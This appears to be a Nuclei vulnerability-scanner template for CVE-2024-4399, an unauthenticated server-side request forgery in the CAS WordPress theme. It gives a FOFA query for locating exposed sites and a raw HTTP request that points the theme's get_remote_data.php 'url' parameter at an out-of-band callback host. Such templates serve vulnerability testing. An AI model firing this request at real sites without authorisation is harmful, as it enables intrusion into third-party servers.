The CAS WordPress theme through version 1.0.0 is vulnerable to Server-Side Request Forgery (SSRF) via the 'url' parameter in the get_remote_data.php script. This vulnerability allows unauthenticated attackers to make the server perform requests to arbitrary URLs.
PoC代码[已公开]
id: CVE-2024-4399
info:
name: WordPress CAS Theme <= 1.0.0 - Server-Side Request Forgery
author: ritikchaddha
severity: critical
description: |
The CAS WordPress theme through version 1.0.0 is vulnerable to Server-Side Request Forgery (SSRF) via the 'url' parameter in the get_remote_data.php script. This vulnerability allows unauthenticated attackers to make the server perform requests to arbitrary URLs.
reference:
- https://wpscan.com/vulnerability/0690327e-da60-4d71-8b3c-ac9533d82302
- https://nvd.nist.gov/view/vuln/detail?vulnId=CVE-2024-4399
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
cvss-score: 9.1
cve-id: CVE-2024-4399
cwe-id: CWE-918
epss-score: 0.30057
epss-percentile: 0.96478
metadata:
max-request: 2
product: cas
fofa-query: body="wp-content/themes/cas/"
tags: cve,cve2024,wp,wordpress,wp-theme,ssrf,cas,oast,vuln
flow: http(1) && http(2)
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
redirects: true
matchers:
- type: word
part: body
words:
- "themes/cas"
internal: true
- raw:
- |
GET /wp-content/themes/cas/get_remote_data.php?url=http://{{interactsh-url}} HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
part: interactsh_protocol
words:
- "http"
# digest: 4b0a0048304602210086b1c7ad46cf7dcfe14e5cf38a908322b2a81512f552799a5f38997314c842db022100e1a513580a9069a69089565f2ac245be2cc3a7c8f51373335a256b4bbea1260b:922c64590222798bb761d5b6d8e72950